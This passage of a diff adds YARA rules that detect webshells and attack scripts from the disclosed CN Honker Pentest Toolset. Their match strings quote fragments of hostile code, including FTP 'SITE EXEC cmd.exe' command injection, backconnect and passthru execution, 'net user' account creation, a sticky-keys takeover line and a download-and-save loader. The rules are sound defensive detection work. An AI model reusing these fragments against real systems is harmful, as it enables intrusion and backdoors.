+      $s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii
+      $s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii
+   condition: 
+      filesize < 8KB and all of them
+}
+
+rule CN_Honker_Webshell_Serv_U_by_Goldsun_RID3525 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file Serv-U_by_Goldsun.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 16:00:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii
+      $s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
+      $s3 = "127.0.0.1:<%=port%>," fullword ascii
+      $s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii
+   condition: 
+      filesize < 30KB and 2 of them
+}
+
+rule CN_Honker_Webshell_PHP_php10_RID314C : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php10.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:16:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii
+      $s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii
+   condition: 
+      filesize < 600KB and all of them
+}
+
+rule CN_Honker_Webshell_Serv_U_servu_RID3344 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file servu.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:40:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii
+      $s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii
+   condition: 
+      filesize < 41KB and all of them
+}
+
+rule CN_Honker_Webshell_portRecall_jsp2_RID3452 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file jsp2.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:25:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii
+      $s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii
+      $s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii
+   condition: 
+      filesize < 23KB and all of them
+}
+
+rule CN_Honker_Webshell_ASPX_aspx2_RID31E5 : CHINA DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file aspx2.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:42:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii
+      $s1 = "<head runat=\"server\">" fullword ascii
+      $s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii
+      $s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 9KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_hy2006a_RID31A9 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file hy2006a.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:32:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii
+      $s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii
+   condition: 
+      filesize < 406KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_php1_RID311C : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php1.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:08:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii
+      $s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii
+      $s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii
+   condition: 
+      filesize < 621KB and all of them
+}
+
+rule CN_Honker_Webshell_jspshell2_RID31F3 : CHINA DEMO T1007 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file jspshell2.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:44:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1007, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii
+      $s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii
+   condition: 
+      filesize < 424KB and all of them
+}
+
+rule CN_Honker_Webshell_Tuoku_script_mysql_RID35FD : CHINA DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file mysql.aspx"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 16:36:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
+      $s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
+   condition: 
+      filesize < 202KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_php9_RID3124 : CHINA DEMO T1087 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php9.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:09:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii
+   condition: 
+      filesize < 1087KB and all of them
+}
+
+rule CN_Honker_Webshell_portRecall_jsp_RID3420 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file jsp.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:17:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_Webshell_ASPX_aspx3_RID31E6 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file aspx3.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:42:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii
+      $s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii
+   condition: 
+      filesize < 100KB and all of them
+}
+
+rule CN_Honker_Webshell_ASPX_shell_shell_RID3486 : CHINA DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file shell.aspx"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:34:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii
+      $s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_Webshell__php1_php7_php9_RID33F2 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - from files php1.txt, php7.txt, php9.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:09:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
+      hash2 = "cd3962b1dba9f1b389212e38857568b69ca76725"
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii
+      $s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
+      $s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
+   condition: 
+      filesize < 300KB and all of them
+}
+
+rule CN_Honker_Webshell__Serv_U_by_Goldsun_asp3_Serv_U_asp_RID3BB0 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - from files Serv-U_by_Goldsun.asp, asp3.txt, Serv-U asp.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 20:39:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
+      hash2 = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii
+      $s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii
+      $s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
+   condition: 
+      filesize < 444KB and all of them
+}
+
+rule CN_Honker_Webshell__asp4_asp4_MSSQL__MSSQL__RID36A6 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - from files asp4.txt, asp4.txt, MSSQL_.asp, MSSQL_.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 17:04:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4005b83ced1c032dc657283341617c410bc007b8"
+      hash2 = "7097c21f92306983add3b5b29a517204cd6cd819"
+      hash3 = "7097c21f92306983add3b5b29a517204cd6cd819"
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii
+      $s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
+      $s2 = "Set Conn = Nothing " fullword ascii
+   condition: 
+      filesize < 341KB and all of them
+}
+
+rule CN_Honker_Webshell__Injection_jmCook_jmPost_ManualInjection_RID3E5C : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - from files Injection.exe, jmCook.asp, jmPost.asp, ManualInjection.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 22:33:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5e1851c77ce922e682333a3cb83b8506e1d7395d"
+      hash2 = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
+      hash3 = "e83d427f44783088a84e9c231c6816c214434526"
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
+      $s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\")  'JMDCW" fullword ascii
+   condition: 
+      filesize < 7342KB and all of them
+}
+
+rule CN_Honker_Webshell_cmfshell_RID31AA : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file cmfshell.cmf"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:32:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii
+      $s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii
+   condition: 
+      filesize < 4KB and all of them
+}
+
+rule CN_Honker_Webshell_Linux_2_6_Exploit_RID34D6 : CHINA DEMO EXPLOIT LINUX T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file 2.6.9"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:47:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXPLOIT, LINUX, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?" fullword ascii
+   condition: 
+      filesize < 56KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_asp2_RID3115 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file asp2.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:07:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii
+      $s2 = "webshell</font> <font color=#00FF00>" fullword ascii
+      $s3 = "Userpwd = \"admin\"   'User Password" fullword ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH_RID3477 : CHINA DEMO T1021 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file FTP MYSQL MSSQL SSH.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:31:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1021, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii
+      $s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
+      $s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii
+      $s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii
+      $s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title>" fullword ascii
+   condition: 
+      filesize < 20KB and 3 of them
+}
+
+rule CN_Honker_Webshell_ASP_shell_RID31B7 : CHINA DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file shell.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:34:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii
+      $s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii
+      $s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_Webshell_PHP_php7_RID3122 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file php7.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:09:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "---> '.$ports[$i].'<br>'; ob_flush(); flush(); } } echo '</div>'; return true; }" ascii
+      $s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii
+   condition: 
+      filesize < 300KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_rootkit_RID32AB : CHINA DEMO MAL T1014 T1087 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file rootkit.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:15:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, MAL, T1014, T1087, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii
+      $s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii
+   condition: 
+      filesize < 80KB and all of them
+}
+
+rule CN_Honker_Webshell_jspshell_RID31C1 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file jspshell.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:36:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii
+      $s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
+   condition: 
+      filesize < 30KB and all of them
+}
+
+rule CN_Honker_Webshell_Serv_U_serv_u_RID33A3 : CHINA DEMO T1085 T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file serv-u.php"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:56:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1085, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" fullword ascii
+      $s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii
+      $s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii
+   condition: 
+      filesize < 435KB and all of them
+}
+
+rule CN_Honker_Webshell_WebShell_RID3172 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file WebShell.cgi"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:22:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii
+      $s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii
+      $s3 = "warn \"command: '$command'\\n\";" fullword ascii
+   condition: 
+      filesize < 30KB and 2 of them
+}
+
+rule CN_Honker_Webshell_Tuoku_script_mssql_2_RID3688 : CHINA DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file mssql.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 16:59:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "sqlpass=request(\"sqlpass\")" fullword ascii
+      $s2 = "set file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii
+      $s3 = "<blockquote> ServerIP:&nbsp;&nbsp;&nbsp;" fullword ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule CN_Honker_Webshell_ASP_asp1_RID3114 : CHINA DEMO T1100 WEBSHELL {
+   meta:
+      description = "Webshell from CN Honker Pentest Toolset - file asp1.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:07:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "SItEuRl=" ascii
+      $s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
+      $s3 = "Server.ScriptTimeout=" ascii
+   condition: 
+      filesize < 200KB and all of them
+}
+
+rule CN_Honker_mafix_root_RID2EFF : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file root"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:38:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo \"# vbox (voice box) getty\" >> /tmp/.init1" fullword ascii
+      $s1 = "cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog" fullword ascii
+      $s2 = "if [ -f /sbin/xlogin ]; then" fullword ascii
+   condition: 
+      filesize < 96KB and all of them
+}
+
+rule CN_Honker_passwd_dict_3389_RID3092 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file 3389.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:45:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "654321" fullword ascii
+      $s1 = "admin123" fullword ascii
+      $s2 = "admin123456" fullword ascii
+      $s3 = "administrator" fullword ascii
+      $s4 = "passwd" fullword ascii
+      $s5 = "password" fullword ascii
+      $s7 = "12345678" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_Perl_serv_U_RID2F2D : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file Perl-serv-U.pl"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:46:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$dir = 'C:\\\\WINNT\\\\System32\\\\';" fullword ascii
+      $s2 = "$sock = IO::Socket::INET->new(\"127.0.0.1:$adminport\") || die \"fail\";" fullword ascii
+   condition: 
+      filesize < 8KB and all of them
+}
+
+rule CN_Honker_F4ck_Team_f4ck_RID2FBC : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file f4ck.txt"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:09:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "PassWord:F4ckTeam!@#" fullword ascii
+      $s1 = "UserName:F4ck" fullword ascii
+      $s2 = "F4ck Team" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_sig_3389_3389_RID2E76 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file 3389.vbs"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:15:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "success = obj.run(\"cmd /c takeown /f %SystemRoot%\\system32\\sethc.exe&echo y| " ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule CN_Honker_sig_3389_3389_2_RID2F07 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:39:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "@del c:\\termsrvhack.dll" fullword ascii
+      $s2 = "@del c:\\3389.txt" fullword ascii
+   condition: 
+      filesize < 3KB and all of them
+}
+
+rule CN_Honker_Injection_Transit_jmCook_RID3470 : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file jmCook.asp"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 15:30:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
